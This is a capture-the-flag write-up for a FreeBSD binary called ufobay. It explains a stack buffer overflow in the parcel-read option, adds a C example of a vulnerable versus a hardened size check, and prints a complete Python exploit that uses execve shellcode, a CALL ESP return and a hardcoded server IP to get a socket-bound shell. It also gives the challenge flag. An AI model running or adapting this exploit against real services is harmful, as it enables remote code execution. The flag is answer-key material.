The given binary is a 32-bit FreeBSD ELF executable, statically linked. After setting up a FreeBSD 9.1 VM, I started analysing the binary. The binary requires a user ufobay and the database file /home/ufobay/ufobay.db. We noticed a buffer overflow vulnerability in option 1, where the program reads the parcel: the user can supply up to 256 bytes of data, while 172 bytes are already enough to reach the saved EIP.
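To make the bug class concrete from the defender's side, here is an added C illustration (constructed for this writeup, not the challenge binary's source). It contrasts the check the writeup implies the program makes (size capped at the protocol limit of 256) with a check bounded by the destination buffer. The buffer size of 168 is an assumption inferred from the exploit's layout (168 filler bytes, saved EBP, saved EIP at offset 172); the function names `size_ok_vuln`, `size_ok_fixed`, `read_parcel_fixed` and `try_parcel` are hypothetical.

```c
#include <stdio.h>
#include <string.h>

/*
 * Constructed illustration of the bug class described above; this is not the
 * challenge binary's source.  MAX_REQUESTED is the limit the writeup says the
 * program enforces on the size field.  PARCEL_BUF is an assumption derived
 * from the exploit layout (saved EBP at offset 168, saved EIP at 172).
 */
#define MAX_REQUESTED 256   /* limit the program enforces on the size field */
#define PARCEL_BUF    168   /* assumed size of the stack buffer */

/* Vulnerable check: the bound is the protocol limit, not the destination.
 * Any size between PARCEL_BUF and MAX_REQUESTED passes and would overrun
 * the buffer, reaching the saved EBP and EIP. */
int size_ok_vuln(long size)
{
    return size > 0 && size <= MAX_REQUESTED;
}

/* Hardened check: the bound is derived from the destination buffer, with one
 * byte reserved for the terminating NUL. */
int size_ok_fixed(long size, size_t buf_size)
{
    return size > 0 && (size_t)size < buf_size;
}

/* Hardened copy: validate before touching the buffer, terminate afterwards.
 * Returns the number of bytes stored, or -1 if the request was rejected. */
int read_parcel_fixed(char *buf, size_t buf_size, const char *in, long size)
{
    if (!size_ok_fixed(size, buf_size))
        return -1;
    memcpy(buf, in, (size_t)size);
    buf[size] = '\0';
    return (int)size;
}

/* Drive read_parcel_fixed with a constructed parcel of `size` 'A' bytes and
 * return its verdict; a real server would read these bytes from the client. */
int try_parcel(long size)
{
    char parcel[MAX_REQUESTED];
    char buf[PARCEL_BUF];

    if (size < 0 || size > MAX_REQUESTED)
        return -1;                       /* outside what the protocol allows */
    memset(parcel, 'A', (size_t)size);
    return read_parcel_fixed(buf, sizeof buf, parcel, size);
}

int main(void)
{
    /* 176 is the length of the writeup's payload (168 + 4 + 4). */
    long sizes[] = { 100, 167, 168, 176, 256 };
    for (size_t i = 0; i < sizeof sizes / sizeof sizes[0]; i++) {
        long n = sizes[i];
        printf("size %3ld: vulnerable check %s, hardened copy -> %d\n",
               n, size_ok_vuln(n) ? "accepts" : "rejects", try_parcel(n));
    }
    return 0;
}
```

The 176-byte payload the writeup sends is exactly a request the protocol-limit check lets through; a check derived from `sizeof buf` rejects it before any byte is written, which is the fix a reviewer would ask for in code like this.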
Here is the idea of the exploit:
[*] Overwrite the saved EIP with a CALL ESP gadget
[*] Place the shellcode immediately after the CALL ESP gadget
Below is the exploit:
```python
#!/usr/bin/env python
# Python 2 script (print statement, str payloads).
import struct
import socket
import time

# msfvenom -p bsd/x86/exec CMD='/bin/sh -c sh<&5 >&5' -a x86_64 -b '\x0a'
# 32-bit BSD execve shellcode; fd 5 is the client socket, so the shell's
# stdin/stdout are tied to the connection.
shellcode = ("\x6a\x3b\x58\x99\x52\x68\x2d\x63\x00\x00\x89\xe7\x52\x68" +
             "\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\xe8\x15" +
             "\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x63\x20" +
             "\x73\x68\x3c\x26\x35\x20\x3e\x26\x35\x00\x57\x53\x89\xe1" +
             "\x52\x51\x53\x50\xcd\x80")

ret_addr = struct.pack("<I", 0x080ff46d)  # call esp
NOP = struct.pack("B", 0x90)
EBP = struct.pack("<I", 0x0815c080)       # value for the saved EBP slot

# 168 bytes of filler reach the saved EBP; the saved EIP follows at offset 172.
# After CALL ESP, execution continues in the shellcode placed right after it.
payload = NOP * 168 + EBP + ret_addr + shellcode

ip = '92.63.96.226'
#ip = '192.168.122.200'
port = 1337

soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.connect((ip, port))
time.sleep(1)
print soc.recv(1024)

# option
soc.send("1\n")
time.sleep(0.5)
print soc.recv(512)

# source
soc.send("A\n")
time.sleep(0.5)
print soc.recv(512)

# destination
soc.send("A\n")
time.sleep(0.5)
print soc.recv(512)

# size
soc.send(str(len(payload)) + "\n")
time.sleep(0.5)
print soc.recv(512)

# parcel
soc.send(payload + "\n")
time.sleep(0.5)

# interact with the spawned shell
soc.send("cat key\n")
time.sleep(0.5)
print soc.recv(1024)
```
The flag for the challenge is H0wCanW3D3F3atAL1ENZ.
Could you please share the challenge file?
Thank you very much :)
http://www.mediafire.com/?nj4dhguho92kqgn